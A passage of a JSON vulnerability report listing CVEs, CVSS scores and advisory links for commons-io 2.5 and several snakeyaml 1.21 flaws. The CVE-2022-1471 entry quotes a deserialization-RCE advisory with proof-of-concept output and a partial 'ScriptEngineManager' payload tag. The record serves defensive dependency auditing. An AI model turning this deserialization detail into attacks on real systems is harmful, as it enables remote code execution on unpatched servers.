List","url":"https://lists.apache.org/thread.html/r0d73e2071d1f1afe1a15da14c5b6feb2cf17e3871168d5a3c8451436@%3Ccommits.pulsar.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r1c2f4683c35696cf6f863e3c107e37ec41305b1930dd40c17260de71@%3Ccommits.pulsar.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r20416f39ca7f7344e7d76fe4d7063bb1d91ad106926626e7e83fb346@%3Cnotifications.zookeeper.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r2345b49dbffa8a5c3c589c082fe39228a2c1d14f11b96c523da701db@%3Cnotifications.zookeeper.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r2721aba31a8562639c4b937150897e24f78f747cdbda8641c0f659fe@%3Cusers.kafka.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r27b1eedda37468256c4bb768fde1e8b79b37ec975cbbfd0d65a7ac34@%3Cdev.myfaces.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r2bc986a070457daca457a54fe71ee09d2584c24dc262336ca32b6a19@%3Cdev.creadur.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r2df50af2641d38f432ef025cd2ba5858215cc0cf3fc10396a674ad2e@%3Cpluto-scm.portals.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r345330b7858304938b7b8029d02537a116d75265a598c98fa333504a@%3Cdev.creadur.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r4050f9f6b42ebfa47a98cbdee4aabed4bb5fb8093db7dbb88faceba2@%3Ccommits.zookeeper.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r462db908acc1e37c455e11b1a25992b81efd18e641e7e0ceb1b6e046@%3Cnotifications.zookeeper.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r477c285126ada5c3b47946bb702cb222ac4e7fd3100c8549bdd6d3b2@%3Cissues.zookeeper.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r47ab6f68cbba8e730f42c4ea752f3a44eb95fb09064070f2476bb401@%3Cdev.creadur.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r5149f78be265be69d34eacb4e4b0fc7c9c697bcdfa91a1c1658d717b@%3Cissues.zookeeper.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r523a6ffad58f71c4f3761e3cee72df878e48cdc89ebdce933be1475c@%3Cdev.creadur.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r808be7d93b17a7055c1981a8453ae5f0d0fce5855407793c5d0ffffa@%3Cuser.commons.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r8569a41d565ca880a4dee0e645dad1cd17ab4a92e68055ad9ebb7375@%3Cdev.creadur.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r86528f4b7d222aed7891e7ac03d69a0db2a2dfa17b86ac3470d7f374@%3Cnotifications.zookeeper.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r873d5ddafc0a68fd999725e559776dc4971d1ab39c0f5cc81bd9bc04@%3Ccommits.pulsar.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r8bfc7235e6b39d90e6f446325a5a44c3e9e50da18860fdabcee23e29@%3Cissues.zookeeper.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r8efcbabde973ea72f5e0933adc48ef1425db5cde850bf641b3993f31@%3Cdev.commons.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r92ea904f4bae190b03bd42a4355ce3c2fbe8f36ab673e03f6ca3f9fa@%3Cnotifications.zookeeper.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/ra8ef65aedc086d2d3d21492b4c08ae0eb8a3a42cc52e29ba1bc009d8@%3Cdev.creadur.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/raa053846cae9d497606027816ae87b4e002b2e0eb66cb0dee710e1f5@%3Cdev.creadur.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rad4ae544747df32ccd58fff5a86cd556640396aeb161aa71dd3d192a@%3Cuser.commons.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rbebd3e19651baa7a4a5503a9901c95989df9d40602c8e35cb05d3eb5@%3Cdev.creadur.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rc10fa20ef4d13cbf6ebe0b06b5edb95466a1424a9b7673074ed03260@%3Cnotifications.zookeeper.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rc2dd3204260e9227a67253ef68b6f1599446005bfa0e1ddce4573a80@%3Cpluto-dev.portals.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rc359823b5500e9a9a2572678ddb8e01d3505a7ffcadfa8d13b8780ab%40%3Cuser.commons.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rc5f3df5316c5237b78a3dff5ab95b311ad08e61d418cd992ca7e34ae@%3Cnotifications.zookeeper.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rc65f9bc679feffe4589ea0981ee98bc0af9139470f077a91580eeee0@%3Cpluto-dev.portals.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rca71a10ca533eb9bfac2d590533f02e6fb9064d3b6aa3ec90fdc4f51@%3Cnotifications.zookeeper.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rd09d4ab3e32e4b3a480e2ff6ff118712981ca82e817f28f2a85652a6@%3Cnotifications.zookeeper.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/re41e9967bee064e7369411c28f0f5b2ad28b8334907c9c6208017279@%3Cnotifications.zookeeper.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/red3aea910403d8620c73e1c7b9c9b145798d0469eb3298a7be7891af@%3Cnotifications.zookeeper.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rfa2f08b7c0caf80ca9f4a18bd875918fdd4e894e2ea47942a4589b9c@%3Cdev.creadur.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rfcd2c649c205f12b72dde044f905903460669a220a2eb7e12652d19d@%3Cdev.zookeeper.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rfd01af05babc95b8949e6d8ea78d9834699e1b06981040dde419a330@%3Cdev.commons.apache.org%3E"},{"summary":"Debian Mailing List","url":"https://lists.debian.org/debian-lts-announce/2021/08/msg00016.html"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2021-29425"},{"summary":"Cve 2021","url":"https://nvd.nist.gov/vuln/detail/CVE-2021-29425"},{"summary":"NetApp Advisory ntap-20220210-0004","url":"https://security.netapp.com/advisory/ntap-20220210-0004"},{"summary":"Oracle Advisory cpuapr2022","url":"https://www.oracle.com/security-alerts/cpuapr2022.html"},{"summary":"Oracle Advisory cpujan2022","url":"https://www.oracle.com/security-alerts/cpujan2022.html"},{"summary":"Oracle Advisory cpujul2022","url":"https://www.oracle.com/security-alerts/cpujul2022.html"},{"summary":"Oracle Advisory cpuoct2021","url":"https://www.oracle.com/security-alerts/cpuoct2021.html"}],"scores":[{"cvss_v3":{"attackComplexity":"HIGH","attackVector":"NETWORK","availabilityImpact":"NONE","baseScore":4.8,"baseSeverity":"MEDIUM","confidentialityImpact":"LOW","environmentalScore":4.8,"environmentalSeverity":"MEDIUM","integrityImpact":"LOW","modifiedAttackComplexity":"HIGH","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"NONE","modifiedConfidentialityImpact":"LOW","modifiedIntegrityImpact":"LOW","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":4.8,"temporalSeverity":"MEDIUM","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N","version":"3.1"},"products":["commons-io/commons-io@vers:maven/>=0.1|<=2.6"]}],"title":"CVE-2021-29425/pkg:maven/commons-io/commons-io@2.5?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2022-25857"]}],"cve":"CVE-2022-25857","cwe":{"id":"400","name":"Uncontrolled Resource Consumption"},"discovery_date":"2022-08-31T00:00:24","ids":[{"system_name":"CVE Record","text":"CVE-2022-25857"},{"system_name":"Snyk Advisory","text":"SNYK-JAVA-ORGYAML-2806360"},{"system_name":"NetApp Advisory","text":"ntap-20240315-0010"}],"notes":[{"audience":"developers","category":"other","text":"Improper Restriction of Recursive Entity References in DTDs","title":"Additional CWE: 776"},{"category":"description","details":"Vulnerability Description","text":"Uncontrolled Resource Consumption in snakeyaml"},{"category":"details","details":"Vulnerability Details","text":"# Uncontrolled Resource Consumption in snakeyaml The package org.yaml:snakeyaml from 0 and before 1.31 are vulnerable to Denial of Service (DoS) due missing to nested depth limitation for collections."}],"product_status":{"known_affected":["org.yaml/snakeyaml@vers:maven/>=1.4|<=1.30"],"known_not_affected":["org.yaml/snakeyaml@1.31"]},"references":[{"summary":"Debian Mailing List","url":"https://lists.debian.org/debian-lts-announce/2022/10/msg00001.html"},{"summary":"Cve 2022","url":"https://nvd.nist.gov/vuln/detail/CVE-2022-25857"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2022-25857"},{"summary":"NetApp Advisory ntap-20240315-0010","url":"https://security.netapp.com/advisory/ntap-20240315-0010"},{"summary":"Snyk Advisory SNYK-JAVA-ORGYAML-2806360","url":"https://security.snyk.io/vuln/SNYK-JAVA-ORGYAML-2806360"}],"scores":[{"cvss_v3":{"attackComplexity":"LOW","attackVector":"NETWORK","availabilityImpact":"HIGH","baseScore":7.5,"baseSeverity":"HIGH","confidentialityImpact":"NONE","environmentalScore":7.5,"environmentalSeverity":"HIGH","integrityImpact":"NONE","modifiedAttackComplexity":"LOW","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"NONE","modifiedIntegrityImpact":"NONE","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":7.5,"temporalSeverity":"HIGH","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H","version":"3.1"},"products":["org.yaml/snakeyaml@vers:maven/>=1.4|<=1.30"]}],"title":"CVE-2022-25857/pkg:maven/org.yaml/snakeyaml@1.21?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2022-38751"]}],"cve":"CVE-2022-38751","cwe":{"id":"121","name":"Stack-based Buffer Overflow"},"discovery_date":"2022-09-06T00:00:27","ids":[{"system_name":"CVE Record","text":"CVE-2022-38751"},{"system_name":"Gentoo Advisory","text":"glsa-202305-28"},{"system_name":"NetApp Advisory","text":"ntap-20240315-0010"}],"notes":[{"audience":"developers","category":"other","text":"Out-of-bounds Write","title":"Additional CWE: 787"},{"category":"description","details":"Vulnerability Description","text":"snakeYAML before 1.31 vulnerable to Denial of Service due to Out-of-bounds Write"},{"category":"details","details":"Vulnerability Details","text":"# snakeYAML before 1.31 vulnerable to Denial of Service due to Out-of-bounds Write Using snakeYAML to parse untrusted YAML files may be vulnerable to Denial of Service attacks (DOS). If the parser is running on user supplied input, an attacker may supply content that causes the parser to crash by stackoverflow."}],"product_status":{"known_affected":["org.yaml/snakeyaml@vers:maven/>=1.4|<=1.30"],"known_not_affected":["org.yaml/snakeyaml@1.31"]},"references":[{"summary":"Debian Mailing List","url":"https://lists.debian.org/debian-lts-announce/2022/10/msg00001.html"},{"summary":"Cve 2022","url":"https://nvd.nist.gov/vuln/detail/CVE-2022-38751"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2022-38751"},{"summary":"Gentoo Advisory glsa-202305-28","url":"https://security.gentoo.org/glsa/202305-28"},{"summary":"NetApp Advisory ntap-20240315-0010","url":"https://security.netapp.com/advisory/ntap-20240315-0010"}],"scores":[{"cvss_v3":{"attackComplexity":"LOW","attackVector":"NETWORK","availabilityImpact":"HIGH","baseScore":6.5,"baseSeverity":"MEDIUM","confidentialityImpact":"NONE","environmentalScore":6.5,"environmentalSeverity":"MEDIUM","integrityImpact":"NONE","modifiedAttackComplexity":"LOW","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"NONE","modifiedIntegrityImpact":"NONE","modifiedPrivilegesRequired":"LOW","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"LOW","scope":"UNCHANGED","temporalScore":6.5,"temporalSeverity":"MEDIUM","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H","version":"3.1"},"products":["org.yaml/snakeyaml@vers:maven/>=1.4|<=1.30"]}],"title":"CVE-2022-38751/pkg:maven/org.yaml/snakeyaml@1.21?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2022-38752"]}],"cve":"CVE-2022-38752","cwe":{"id":"121","name":"Stack-based Buffer Overflow"},"discovery_date":"2022-09-06T00:00:27","ids":[{"system_name":"CVE Record","text":"CVE-2022-38752"},{"system_name":"Gentoo Advisory","text":"glsa-202305-28"},{"system_name":"NetApp Advisory","text":"ntap-20240315-0009"}],"notes":[{"audience":"developers","category":"other","text":"Out-of-bounds Write","title":"Additional CWE: 787"},{"category":"description","details":"Vulnerability Description","text":"snakeYAML before 1.32 vulnerable to Denial of Service due to Out-of-bounds Write"},{"category":"details","details":"Vulnerability Details","text":"# snakeYAML before 1.32 vulnerable to Denial of Service due to Out-of-bounds Write Using snakeYAML to parse untrusted YAML files may be vulnerable to Denial of Service attacks (DoS). If the parser is running on user supplied input, an attacker may supply content that causes the parser to crash by stack-overflow."}],"product_status":{"known_affected":["org.yaml/snakeyaml@vers:maven/>=1.4|<=1.31"],"known_not_affected":["org.yaml/snakeyaml@1.32"]},"references":[{"summary":"Cve 2022","url":"https://nvd.nist.gov/vuln/detail/CVE-2022-38752"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2022-38752"},{"summary":"Gentoo Advisory glsa-202305-28","url":"https://security.gentoo.org/glsa/202305-28"},{"summary":"NetApp Advisory ntap-20240315-0009","url":"https://security.netapp.com/advisory/ntap-20240315-0009"}],"scores":[{"cvss_v3":{"attackComplexity":"LOW","attackVector":"NETWORK","availabilityImpact":"HIGH","baseScore":6.5,"baseSeverity":"MEDIUM","confidentialityImpact":"NONE","environmentalScore":6.5,"environmentalSeverity":"MEDIUM","integrityImpact":"NONE","modifiedAttackComplexity":"LOW","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"NONE","modifiedIntegrityImpact":"NONE","modifiedPrivilegesRequired":"LOW","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"LOW","scope":"UNCHANGED","temporalScore":6.5,"temporalSeverity":"MEDIUM","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H","version":"3.1"},"products":["org.yaml/snakeyaml@vers:maven/>=1.4|<=1.31"]}],"title":"CVE-2022-38752/pkg:maven/org.yaml/snakeyaml@1.21?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2022-38749"]}],"cve":"CVE-2022-38749","cwe":{"id":"121","name":"Stack-based Buffer Overflow"},"discovery_date":"2022-09-06T00:00:27","ids":[{"system_name":"Arxiv Advisory","text":"2306"},{"system_name":"CVE Record","text":"CVE-2022-38749"},{"system_name":"Gentoo Advisory","text":"glsa-202305-28"},{"system_name":"NetApp Advisory","text":"ntap-20240315-0010"}],"notes":[{"audience":"developers","category":"other","text":"Out-of-bounds Write","title":"Additional CWE: 787"},{"category":"description","details":"Vulnerability Description","text":"snakeYAML before 1.31 vulnerable to Denial of Service due to Out-of-bounds Write"},{"category":"details","details":"Vulnerability Details","text":"# snakeYAML before 1.31 vulnerable to Denial of Service due to Out-of-bounds Write Using snakeYAML to parse untrusted YAML files may be vulnerable to Denial of Service attacks (DOS). If the parser is running on user supplied input, an attacker may supply content that causes the parser to crash by stackoverflow."}],"product_status":{"known_affected":["org.yaml/snakeyaml@vers:maven/>=1.4|<=1.30"],"known_not_affected":["org.yaml/snakeyaml@1.31"]},"references":[{"summary":"Arxiv Advisory 2306","url":"https://arxiv.org/pdf/2306.05534.pdf"},{"summary":"Debian Mailing List","url":"https://lists.debian.org/debian-lts-announce/2022/10/msg00001.html"},{"summary":"Cve 2022","url":"https://nvd.nist.gov/vuln/detail/CVE-2022-38749"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2022-38749"},{"summary":"Gentoo Advisory glsa-202305-28","url":"https://security.gentoo.org/glsa/202305-28"},{"summary":"NetApp Advisory ntap-20240315-0010","url":"https://security.netapp.com/advisory/ntap-20240315-0010"}],"scores":[{"cvss_v3":{"attackComplexity":"LOW","attackVector":"NETWORK","availabilityImpact":"HIGH","baseScore":6.5,"baseSeverity":"MEDIUM","confidentialityImpact":"NONE","environmentalScore":6.5,"environmentalSeverity":"MEDIUM","integrityImpact":"NONE","modifiedAttackComplexity":"LOW","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"NONE","modifiedIntegrityImpact":"NONE","modifiedPrivilegesRequired":"LOW","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"LOW","scope":"UNCHANGED","temporalScore":6.5,"temporalSeverity":"MEDIUM","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H","version":"3.1"},"products":["org.yaml/snakeyaml@vers:maven/>=1.4|<=1.30"]}],"title":"CVE-2022-38749/pkg:maven/org.yaml/snakeyaml@1.21?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2022-38750"]}],"cve":"CVE-2022-38750","cwe":{"id":"121","name":"Stack-based Buffer Overflow"},"discovery_date":"2022-09-06T00:00:27","ids":[{"system_name":"CVE Record","text":"CVE-2022-38750"},{"system_name":"Gentoo Advisory","text":"glsa-202305-28"},{"system_name":"NetApp Advisory","text":"ntap-20240315-0010"}],"notes":[{"audience":"developers","category":"other","text":"Out-of-bounds Write","title":"Additional CWE: 787"},{"category":"description","details":"Vulnerability Description","text":"snakeYAML before 1.31 vulnerable to Denial of Service due to Out-of-bounds Write"},{"category":"details","details":"Vulnerability Details","text":"# snakeYAML before 1.31 vulnerable to Denial of Service due to Out-of-bounds Write Using snakeYAML to parse untrusted YAML files may be vulnerable to Denial of Service attacks (DOS). If the parser is running on user supplied input, an attacker may supply content that causes the parser to crash by stackoverflow."}],"product_status":{"known_affected":["org.yaml/snakeyaml@vers:maven/>=1.4|<=1.30"],"known_not_affected":["org.yaml/snakeyaml@1.31"]},"references":[{"summary":"Debian Mailing List","url":"https://lists.debian.org/debian-lts-announce/2022/10/msg00001.html"},{"summary":"Cve 2022","url":"https://nvd.nist.gov/vuln/detail/CVE-2022-38750"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2022-38750"},{"summary":"Gentoo Advisory glsa-202305-28","url":"https://security.gentoo.org/glsa/202305-28"},{"summary":"NetApp Advisory ntap-20240315-0010","url":"https://security.netapp.com/advisory/ntap-20240315-0010"}],"scores":[{"cvss_v3":{"attackComplexity":"LOW","attackVector":"LOCAL","availabilityImpact":"HIGH","baseScore":5.5,"baseSeverity":"MEDIUM","confidentialityImpact":"NONE","environmentalScore":5.5,"environmentalSeverity":"MEDIUM","integrityImpact":"NONE","modifiedAttackComplexity":"LOW","modifiedAttackVector":"LOCAL","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"NONE","modifiedIntegrityImpact":"NONE","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"REQUIRED","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":5.5,"temporalSeverity":"MEDIUM","userInteraction":"REQUIRED","vectorString":"CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H","version":"3.1"},"products":["org.yaml/snakeyaml@vers:maven/>=1.4|<=1.30"]}],"title":"CVE-2022-38750/pkg:maven/org.yaml/snakeyaml@1.21?type=jar"},{"cve":"CVE-2022-1471","cwe":{"id":"20","name":"Improper Input Validation"},"discovery_date":"2022-12-12T21:19:47","ids":[{"system_name":"CVE Record","text":"CVE-2022-1471"},{"system_name":"GitHub Advisory","text":"GHSA-mjmj-j48q-9wg2"},{"system_name":"NetApp Advisory","text":"ntap-20230818-0015"},{"system_name":"NetApp Advisory","text":"ntap-20240621-0006"}],"notes":[{"audience":"developers","category":"other","text":"Deserialization of Untrusted Data","title":"Additional CWE: 502"},{"category":"description","details":"Vulnerability Description","text":"SnakeYaml Constructor Deserialization Remote Code Execution"},{"category":"details","details":"Vulnerability Details","text":"# SnakeYaml Constructor Deserialization Remote Code Execution ### Summary SnakeYaml's `Constructor` class, which inherits from `SafeConstructor`, allows any type be deserialized given the following line:  new Yaml(new Constructor(TestDataClass.class)).load(yamlContent);  Types do not have to match the types of properties in the target class. A `ConstructorException` is thrown, but only after a malicious payload is deserialized.  ### Severity High, lack of type checks during deserialization allows remote code execution.  ### Proof of Concept Execute `bash run.sh`. The PoC uses Constructor to deserialize a payload for RCE. RCE is demonstrated by using a payload which performs a http request to http://127.0.0.1:8000.  Example output of successful run of proof of concept:  ``` $ bash run.sh  [+] Downloading snakeyaml if needed [+] Starting mock HTTP server on 127.0.0.1:8000 to demonstrate RCE nc: no process found [+] Compiling and running Proof of Concept, which a payload that sends a HTTP request to mock web server. [+] An exception is expected. Exception: Cannot create property=payload for JavaBean=Main$TestDataClass@3cbbc1e0  in 'string', line 1, column 1:   payload: !!javax.script.ScriptEn ...    ^ Can not set java.lang.String field Main$TestDataClass.payload to javax.script.ScriptEngineManager  in 'string', line 1, column 10:   payload: !!javax.script.ScriptEngineManag ...         ^   at org.yaml.snakeyaml.constructor.Constructor$ConstructMapping.constructJavaBean2ndStep(Constructor.java:291)  at org.yaml.snakeyaml.constructor.Constructor$ConstructMapping.construct(Constructor.java:172)  at org.yaml.snakeyaml.constructor.Constructor$ConstructYamlObject.construct(Constructor.java:332)  at org.yaml.snakeyaml.constructor.BaseConstructor.constructObjectNoCheck(BaseConstructor.java:230)  at org.yaml.snakeyaml.constructor.BaseConstructor.constructObject(BaseConstructor.java:220)  at org.yaml.snakeyaml.constructor.BaseConstructor.constructDocument(BaseConstructor.java:174)  at org.yaml.snakeyaml.constructor.BaseConstructor.getSingleData(BaseConstructor.java:158)  at org.yaml.snakeyaml.Yaml.loadFromReader(Yaml.java:491)  at org.yaml.snakeyaml.Yaml.load(Yaml.java:416)  at Main.main(Main.java:37) Caused by: java.lang.IllegalArgumentException: Can not set java.lang.String field Main$TestDataClass.payload to javax.script.ScriptEngineManager  at java.base/jdk.internal.reflect.UnsafeFieldAccessorImpl.throwSetIllegalArgumentException(UnsafeFieldAccessorImpl.java:167)  at java.base/jdk.internal.reflect.UnsafeFieldAccessorImpl.throwSetIllegalArgumentException(UnsafeFieldAccessorImpl.java:171)  at java.base/jdk.internal.reflect.UnsafeObjectFieldAccessorImpl.set(UnsafeObjectFieldAccessorImpl.java:81)  at java.base/java.lang.reflect.Field.set(Field.java:780)  at org.yaml.snakeyaml.introspector.FieldProperty.set(FieldProperty.java:44)  at org.yaml.snakeyaml.constructor.Constructor$ConstructMapping.constructJavaBean2ndStep(Constructor.java:286)  ... 9 more [+] Dumping Received HTTP Request. Will not be empty if PoC worked GET /proof-of-concept HTTP/1.1 User-Agent: Java/11.0.14 Host: localhost:8000 Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2 Connection: keep-alive ```  ### Further Analysis Potential mitigations include, leveraging SnakeYaml's SafeConstructor while parsing untrusted content.  See https://bitbucket.org/snakeyaml/snakeyaml/issues/561/cve-2022-1471-vulnerability-in#comment-64581479 for discussion on the subject.  A fix was released in version 2.0. See https://bitbucket.org/snakeyaml/snakeyaml/issues/561/cve-2022-1471-vulnerability-in#comment-64876314 for more information.  ### Timeline **Date reported**: 4/11/2022 **Date fixed**:  **Date disclosed**: 10/13/2022"}],"product_status":{"known_affected":["org.yaml/snakeyaml@vers:maven/>=1.4|<=1.33"]},"references":[{"summary":"Packetstormsecurity Exploit","url":"http://packetstormsecurity.com/files/175095/PyTorch-Model-Server-Registration-Deserialization-Remote-Code-Execution.html"},{"summary":"Openwall Mailing List","url":"http://www.openwall.com/lists/oss-security/2023/11/19/1"},{"summary":"GitHub Advisory GHSA-mjmj-j48q-9wg2","url":"https://github.com/google/security-research/security/advisories/GHSA-mjmj-j48q-9wg2"},{"summary":"Google Mailing List","url":"https://groups.google.com/g/kubernetes-security-announce/c/mwrakFaEdnc"},{"summary":"Cve 2022","url":"https://nvd.nist.gov/vuln/detail/CVE-2022-1471"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2022-1471"},{"summary":"NetApp Advisory ntap-20230818-0015","url":"https://security.netapp.com/advisory/ntap-20230818-0015"},{"summary":"NetApp Advisory ntap-20240621-0006","url":"https://security.netapp.com/advisory/ntap-20240621-0006"},{"summary":"Cve 2022","url":"https://snyk.io/blog/unsafe-deserialization-snakeyaml-java-cve-2022-1471"}],"scores":[{"cvss_v3":{"attackComplexity":"LOW","attackVector":"NETWORK","availabilityImpact":"LOW","baseScore":8.3,"baseSeverity":"HIGH","confidentialityImpact":"HIGH","environmentalScore":8.3,"environmentalSeverity":"HIGH","integrityImpact":"HIGH","modifiedAttackComplexity":"LOW","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"LOW","modifiedConfidentialityImpact":"HIGH","modifiedIntegrityImpact":"HIGH","modifiedPrivilegesRequired":"LOW","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"LOW","scope":"UNCHANGED","temporalScore":8.3,"temporalSeverity":"HIGH","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:L","version":"3.1"},"products":["org.yaml/snakeyaml@vers:maven/>=1.4|<=1.33"]}],"title":"CVE-2022-1471/pkg:maven/org.yaml/snakeyaml@1.21?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2022-41854"]}],"cve":"CVE-2022-41854","cwe":{"id":"121","name":"Stack-based Buffer Overflow"},"discovery_date":"2022-11-11T19:00:31","ids":[{"system_name":"CVE Record","text":"CVE-2022-41854"},{"system_name":"NetApp Advisory","text":"ntap-20240315-0009"},{"system_name":"NetApp Advisory","text":"ntap-20240621-0006"}],"notes":[{"audience":"developers","category":"other","text":"Out-of-bounds Write","title":"Additional CWE: 787"},{"category":"description","details":"Vulnerability Description","text":"Snakeyaml vulnerable to Stack overflow leading to denial of service"},{"category":"details","details":"Vulnerability Details","text":"# Snakeyaml vulnerable to Stack overflow leading to denial of service Those using Snakeyaml to parse untrusted YAML files may be vulnerable to Denial of Service attacks (DOS). If the parser is running on user supplied input, an attacker may supply content that causes the parser to crash by stack overflow. This effect may support a denial of service attack."}],"product_status":{"known_affected":["org.yaml/snakeyaml@vers:maven/>=1.4|<=1.31"]},"references":[{"summary":"Fedora Project Mailing List","url":"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/3DDXEXXWAZGF5AVHIPGFPXIWL6TSMKJE"},{"summary":"Fedora Project Mailing List","url":"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/7MKE4XWRXTH32757H7QJU4ACS67DYDCR"},{"summary":"Fedora Project Mailing List","url":"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/KSPAJ5Y45A4ZDION2KN5RDWLHK4XKY2J"},{"summary":"Fedora Project Mailing List","url":"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/3DDXEXXWAZGF5AVHIPGFPXIWL6TSMKJE"},{"summary":"Fedora Project Mailing List","url":"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/7MKE4XWRXTH32757H7QJU4ACS67DYDCR"},{"summary":"Fedora Project Mailing List","url":"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/KSPAJ5Y45A4ZDION2KN5RDWLHK4XKY2J"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2022-41854"},{"summary":"Cve 2022","url":"https://nvd.nist.gov/vuln/detail/CVE-2022-41854"},{"summary":"NetApp Advisory ntap-20240315-0009","url":"https://security.netapp.com/advisory/ntap-20240315-0009"},{"summary":"NetApp Advisory 